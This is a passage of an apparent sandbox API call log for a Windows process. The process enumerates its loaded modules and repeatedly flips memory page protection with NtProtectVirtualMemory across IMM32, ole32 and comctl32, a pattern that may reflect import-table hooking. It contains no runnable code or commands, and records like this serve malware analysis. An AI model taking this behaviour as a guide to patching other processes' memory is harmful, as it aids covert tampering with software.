OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.917] GetCurrentProcess () returned 0xffffffff [0052.917] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd040, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.917] GetCurrentProcess () returned 0xffffffff [0052.917] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd048, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.918] GetCurrentProcess () returned 0xffffffff [0052.918] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd048, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.918] GetCurrentProcess () returned 0xffffffff [0052.918] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd04c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.918] GetCurrentProcess () returned 0xffffffff [0052.919] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd04c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.919] GetCurrentProcess () returned 0xffffffff [0052.919] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd050, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.919] GetCurrentProcess () returned 0xffffffff [0052.919] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd050, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.919] GetCurrentProcess () returned 0xffffffff [0052.919] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd054, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.920] GetCurrentProcess () returned 0xffffffff [0052.920] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd054, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.920] GetCurrentProcess () returned 0xffffffff [0052.920] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd06c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.968] GetCurrentProcess () returned 0xffffffff [0052.968] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd06c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.968] GetCurrentProcess () returned 0xffffffff [0052.968] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd084, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.968] GetCurrentProcess () returned 0xffffffff [0052.968] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd084, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.968] GetCurrentProcess () returned 0xffffffff [0052.968] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd08c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.969] GetCurrentProcess () returned 0xffffffff [0052.969] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd08c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.969] GetCurrentProcess () returned 0xffffffff [0052.969] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd090, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.969] GetCurrentProcess () returned 0xffffffff [0052.970] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd090, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.970] GetCurrentProcess () returned 0xffffffff [0052.970] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd0a0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.970] GetCurrentProcess () returned 0xffffffff [0052.970] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd0a0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.970] GetCurrentProcess () returned 0xffffffff [0052.970] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd13c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.971] GetCurrentProcess () returned 0xffffffff [0052.971] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd13c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.971] GetCurrentProcess () returned 0xffffffff [0052.971] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd150, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.971] GetCurrentProcess () returned 0xffffffff [0052.971] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd150, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.972] GetCurrentProcess () returned 0xffffffff [0052.972] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd1a8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.972] GetCurrentProcess () returned 0xffffffff [0052.972] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd1a8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.972] GetCurrentProcess () returned 0xffffffff [0052.972] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd1c0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.973] GetCurrentProcess () returned 0xffffffff [0052.973] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd1c0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.973] GetCurrentProcess () returned 0xffffffff [0052.973] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd1d8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.973] GetCurrentProcess () returned 0xffffffff [0052.973] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd1d8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.974] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.975] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.975] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.975] GetModuleFileNameA (in: hModule=0x754c0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0052.975] GetCurrentProcess () returned 0xffffffff [0052.975] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db030, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.976] GetCurrentProcess () returned 0xffffffff [0052.976] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db030, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.976] GetCurrentProcess () returned 0xffffffff [0052.976] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db038, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.976] GetCurrentProcess () returned 0xffffffff [0052.976] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db038, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.977] GetCurrentProcess () returned 0xffffffff [0052.977] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db040, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.977] GetCurrentProcess () returned 0xffffffff [0052.977] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db040, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.977] GetCurrentProcess () returned 0xffffffff [0052.977] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db054, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.978] GetCurrentProcess () returned 0xffffffff [0052.978] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db054, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.978] GetCurrentProcess () returned 0xffffffff [0052.978] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db058, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.978] GetCurrentProcess () returned 0xffffffff [0052.978] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db058, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.979] GetCurrentProcess () returned 0xffffffff [0052.979] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db05c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.979] GetCurrentProcess () returned 0xffffffff [0052.979] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db05c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.979] GetCurrentProcess () returned 0xffffffff [0052.979] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db0a0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.980] GetCurrentProcess () returned 0xffffffff [0052.980] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db0a0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.980] GetCurrentProcess () returned 0xffffffff [0052.980] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db0a4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.980] GetCurrentProcess () returned 0xffffffff [0052.980] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db0a4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.981] GetCurrentProcess () returned 0xffffffff [0052.981] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db0ac, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.981] GetCurrentProcess () returned 0xffffffff [0052.981] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db0ac, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.981] GetCurrentProcess () returned 0xffffffff [0052.981] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db0b0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.982] GetCurrentProcess () returned 0xffffffff [0052.982] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x754db0b0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x754db000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.982] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.983] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.983] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.983] GetModuleFileNameA (in: hModule=0x753c0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0052.983] GetCurrentProcess () returned 0xffffffff [0052.983] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7548c820, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7548c000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.984] GetCurrentProcess () returned 0xffffffff [0052.984] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7548c820, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7548c000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.984] GetCurrentProcess () returned 0xffffffff [0052.984] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7548c828, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7548c000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.985] GetCurrentProcess () returned 0xffffffff [0052.985] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7548c828, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7548c000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.985] GetCurrentProcess () returned 0xffffffff [0052.985] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7548c19c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7548c000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.985] GetCurrentProcess () returned 0xffffffff [0052.985] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7548c19c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7548c000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.986] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.986] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.987] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.987] GetModuleFileNameA (in: hModule=0x741e0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.15063.413_none_55bc94a37c2a2854\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.15063.413_none_55bc94a37c2a2854\\comctl32.dll")) returned 0x7a [0052.987] GetCurrentProcess () returned 0xffffffff [0052.987] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74257184, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74257000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.987] GetCurrentProcess () returned 0xffffffff [0052.987] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74257184, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74257000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.987] GetCurrentProcess () returned 0xffffffff [0052.987] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7425718c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74257000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.988] GetCurrentProcess () returned 0xffffffff [0052.988] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7425718c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74257000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.988] GetCurrentProcess () returned 0xffffffff [0052.988] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74257194, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74257000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.988] GetCurrentProcess () returned 0xffffffff [0052.989] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74257194, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74257000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.989] GetCurrentProcess () returned 0xffffffff [0052.989] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74257198, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74257000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.989] GetCurrentProcess () returned 0xffffffff [0052.989] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74257198, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74257000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.989] GetCurrentProcess () returned 0xffffffff [0052.989] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742571c8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74257000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.993] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.994] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.995] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.995] GetModuleFileNameA (in: hModule=0x741d0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\SYSTEM32\\SHFolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll")) returned 0x20 [0052.995] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.996] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.996] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.996] GetModuleFileNameA (in: 